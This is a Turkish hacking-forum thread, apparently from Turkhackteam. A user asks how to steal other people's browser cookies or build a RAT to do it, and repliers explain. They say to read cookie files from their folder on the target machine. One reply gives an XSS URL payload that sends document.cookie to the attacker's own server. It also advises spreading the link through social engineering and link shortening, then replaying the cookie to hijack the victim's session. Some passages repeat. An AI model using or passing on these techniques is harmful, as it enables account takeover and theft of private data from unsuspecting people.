Merhaba, cookieler hakkında birazcik bilgi verebilir misiniz? Cookieleri nasıl çalabilirim? Veya bunun için bir rat yapabilir miyim?
Cookie ler metin dosyasında saklanır. Bu sebeple içerikleri görülebilir (bazı siteler şifreleyerek saklar). İnternette "cookies folder location in windows x" şeklinde aratarak cookie bilgilerinin saklandığı dosyaların dizinlerini bulabilir ve hedef sistemde de aynı yolu kullanarak bilgiler elde edilebilir.Yanıtınız için çok çok teşekkür ederim. Fakat benim dediğim site ile değil de normal bir rat atarak klasörlerinden cookielerine erişemez miyiz?
Senin adına üzüldüm, ben daha çok milleti çalmak değil de test etmek denemek istiyorum. Bilgin var mı bu konu da?benim cerezleri caldılar zaten sinirliyim o konuda , bide tht de konu açıp beni banlattılar eski hesabımda yaptılar
Yanıtınız için çok çok teşekkür ederim. Fakat benim dediğim site ile değil de normal bir rat atarak klasörlerinden cookielerine erişemez miyiz?Cokkie ler bir web sitesine kayıt olup hesabınıza girdikten sonra web site tarafından size özel atanan oturum bilgisidir ve bu bilgi dosyalara yazılır, bu sayede aynı web sayfasını ziyaret ettiğinizde bilgilerinizi yeniden girmeye gerek duymazsınız.
Hedefin Cokkie bilgisini çalmak için en basitinden XSS zafiyetinden yararlanabilirsiniz. Örnek olarak;
http ://vulnerable.webapp/index.php?name=<script>document.location="http: //kendiwebsunucumuz.com/cookie.php?c="+document.cookie;</script> gibi açıklı url ye javascript kodu girerseniz ve sosyal mühendislik ile bunu hedef kişiye atarsanız(link kısaltma ile inandırıcılık arttırılabilir). Hedef kişi linke tıkladığı zaman cookie bilgisini kendi sunucumuza aktarabiliriz. Elde edilen cookie bilgisini EditThisCookie adlı eklenti ile hedefin cookie bilgisini girerek hedef kişinin kullanıcı adı ve parolasına ihtiyaç duymadan hesaba erişebiliriz. Session Hijacking Saldırısını araştırabilirsiniz.
Cookie ler metin dosyasında saklanır. Bu sebeple içerikleri görülebilir (bazı siteler şifreleyerek saklar). İnternette "cookies folder location in windows x" şeklinde aratarak cookie bilgilerinin saklandığı dosyaların dizinlerini bulabilir ve hedef sistemde de aynı yolu kullanarak bilgiler elde edilebilir.Yanıtınız için çok çok teşekkür ederim. Fakat benim dediğim site ile değil de normal bir rat atarak klasörlerinden cookielerine erişemez miyiz?
Turkhackteam.org internet sitesi 5651 sayılı kanun’un 2. maddesinin 1. fıkrasının m) bendi ile aynı kanunun 5. maddesi kapsamında "Yer Sağlayıcı" konumundadır. İçerikler ön onay olmaksızın tamamen kullanıcılar tarafından oluşturulmaktadır. Turkhackteam.org; Yer sağlayıcı olarak, kullanıcılar tarafından oluşturulan içeriği ya da hukuka aykırı paylaşımı kontrol etmekle ya da araştırmakla yükümlü değildir. Türkhackteam saldırı timleri Türk sitelerine hiçbir zararlı faaliyette bulunmaz. Türkhackteam üyelerinin yaptığı bireysel hack faaliyetlerinden Türkhackteam sorumlu değildir. Sitelerinize Türkhackteam ismi kullanılarak hack faaliyetinde bulunulursa, site-sunucu erişim loglarından bu faaliyeti gerçekleştiren ip adresini tespit edip diğer kanıtlarla birlikte savcılığa suç duyurusunda bulununuz.